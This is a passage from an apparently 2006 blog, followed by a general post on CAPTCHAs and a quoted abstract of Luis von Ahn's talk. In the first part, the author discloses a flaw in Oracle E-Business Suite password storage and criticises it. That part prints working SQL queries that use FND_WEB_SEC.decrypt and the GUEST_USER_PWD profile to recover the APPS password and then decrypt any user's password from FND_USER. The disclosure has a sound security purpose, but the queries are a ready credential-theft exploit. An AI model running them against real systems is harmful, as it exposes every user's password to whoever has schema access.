fnd_web_sec.decrypt(
UPPER((SELECT upper(fnd_profile.value('GUEST_USER_PWD')) FROM dual))
,usertable.encrypted_foundation_password)
FROM dual
) AS apps_password
FROM
fnd_user usertable
WHERE
usertable.user_name LIKE upper(
(SELECT
substr(fnd_profile.value('GUEST_USER_PWD'),1,instr(fnd_profile.value('GUEST_USER_PWD'),'/')-1)
FROM dual)
)
/*--------------------------------------------------------------*/

Having this password/decryption key you can now start decrypting all the other user passwords. To make things somewhat easier you can execute the following query that will ask you a username and return the decrypted password of this user account for you.

/*--------------------------------------------------------------*/
SELECT
usertable.user_name
,(SELECT
fnd_web_sec.decrypt(UPPER((
SELECT(
SELECT
fnd_web_sec.decrypt(UPPER(
(SELECT upper(fnd_profile.value('GUEST_USER_PWD')) FROM dual)
)
,usertable.encrypted_foundation_password)
FROM dual
) AS apps_password
FROM
fnd_user usertable
WHERE
usertable.user_name LIKE upper(
(SELECT
substr(fnd_profile.value('GUEST_USER_PWD'),1,instr(fnd_profile.value('GUEST_USER_PWD'),'/')-1)
FROM dual)
)
)
),usertable.encrypted_user_password)
FROM
dual
) AS encrypted_user_password
FROM
fnd_user usertable
WHERE
usertable.user_name LIKE upper('&username')
/*--------------------------------------------------------------*/

This however has still only returned the user password of a user account, if you also want to have the decrypted foundation password of a user account we have to take a closer look at the way the foundation passwords for a user account are decrypted. First take a close look at the way the user foundation password is encrypted by Oracle:

/*--------------------------------------------------------------*/
encFndPwd := encrypt(user||'/'||pwd,fndPwd);
/*--------------------------------------------------------------*/
This learns us that the combination username / password is used to encrypt the foundation password. As we already have decrypted the user password and we know the username we can easily combine those so we have the decryption key. However there is no real use to decrypt the foundation password of the user account because this will be exactly the same foundation password as the one for the guest user. Oracle uses this mechanism to obtain the user foundation password with only the knowledge of the username and password given by the user who tries to login. Using those queries you will be able to decrypt all user passwords available in the FND_USER table.

In my opinion this way of encrypting and storing passwords is so insecure that it is almost unacceptable. Oracle most likely will plead that people having access to the FND_WEB_SEC package under the apps schema are the only people able to use this exploit. However in a normal business environment this will go for almost every apps programmer and consultant who need access to the apps schema to be able to develop new functions in the development environment. If the business logic of the company is not requiring the passwords to be reset when a system is cloned from a production environment to a development environment this can cause a serious security risk.

A better way of handling the encryption and storage of the user passwords would be simply store hash values of the user passwords or using a random value for the foundation password. The decrypted random foundation password then can be used as a decryption key to decrypt the user password and verify that it is the same as the password given by the user attempting to login.

Looking at this mechanism proves that the security of Oracle Applications has to be improved in my opinion and that the trust that is given to this mechanism is based upon a feeling and not based upon good research by the companies relying on this security for there day-to-day business.

I have reported the problem a couple of months ago to Oracle however have never received a response, this is the reason I decided to post those results on my weblog in the hope some developer can come up with a solution, or, Oracle is picking this up finally and will come up with a suitable solution.

Saturday, December 09, 2006

CAPTCHA = Computer or Human

When you are running a popular online application you might be suffering from people writing computer programs that interact with your application in a undesired way. Take for example blogger.com, they have the problem that there platform is used by spammers and people promoting there own website by setting up fake a fake weblog that is only used one time and is forwarding the traffic to for example an adult website.

In those cases the people who are using the system for this purpose would like to create a large amount of weblogs in a automated way because the load is so high it can not be done manually. For example creating a thousand new weblogs is not a job which can easily be done by hand. As you have ever developed a web application or if you, just for a moment, think about how you can automate such a procedure you will find out that this can be done quite easily.

To prevent such a use of the system and to keep automated processes out of the system you, as a developer, will need a way to tell the difference between a “hostile” automated process and a real user. This is the point where it gets tricky, all the traffic will, most likely, be http traffic with gets and posts. So by the nature of the traffic there is no way of telling the difference between a human and a computer.

For this purpose of telling the difference between humans and computers there is a thing we call CAPTCHA. Most likely you have already used a captcha several times before but never have known that this is such a captcha. You can find them when you fill in a online registration when applying for a hotmail account of a Google Gmail account or even when you post a posting to your weblog.

A captcha is the name for this little box with characters you are required to type into a textbox. Most of the times the letters are strangely curled and there is a lot of background noise in the picture. By doing it like this automated systems are unable to recognize what letters are in the picture. Only humans are able to tell this by a visual conformation.

Since CAPTCHAs are based on open problems in artificial intelligence (AI), they also offer well-defined challenges for the AI community, and induce security researchers, as well as otherwise malicious programmers, to advance the field of AI. (This is similar to research in cryptography advancing algorithms for factoring large numbers.) Several groups have created programs that can pass many CAPTCHAs over 80% of the time (see below). These algorithms represent significant progress in the area of text recognition. CAPTCHAs are thus a win-win situation: either a CAPTCHA is not broken and there is a way to differentiate humans from computers, or the CAPTCHA is broken and an AI problem is solved. Using harder AI problems, our newly developed CAPTCHAs are still not broken.

Greg Mori and Jitendra Malik of the University of California at Berkeley have written a program that can solve ez-gimpy with accuracy 83%. Thayananthan, Stenger, Torr, and Cipolla of the Cambridge vision group have written a program that can achieve 93% correct recognition rate against ez-gimpy, and Malik and Mori have matched their accuracy. Their programs represent siginifcant advancements to the field of computer

Also interesting to watch is the talk given by Luis von Ahn on the Google techtalk of July the 26e 2006. Luis von Ahn is an assistant professor in the Computer Science Department at Carnegie Mellon University, where he also received his Ph.D. in 2005. Previously, Luis obtained a B.S. in mathematics from Duke University in 2000. He is the recipient of a Microsoft Research Fellowship.

ABSTRACT Tasks like image recognition are trivial for humans, but continue to challenge even the most sophisticated computer programs. This talk introduces a paradigm for utilizing human processing power to solve problems that computers cannot yet solve. Traditional approaches to solving such problems focus on improving software. I advocate a novel approach: constructively channel human brainpower using computer games. For example, the ESP Game, described in this talk, is an enjoyable online game -- many people play over 40 hours a week -- and when people play, they help label images on the Web with descriptive keywords. These keywords can be used to significantly improve the accuracy of image search. People play the game not because they want to help, but because they enjoy it.

I describe other examples of "games with a purpose": Peekaboom, which helps determine the location of objects in images, and Verbosity, which collects common-sense knowledge. I also explain a general approach for constructing games with a purpose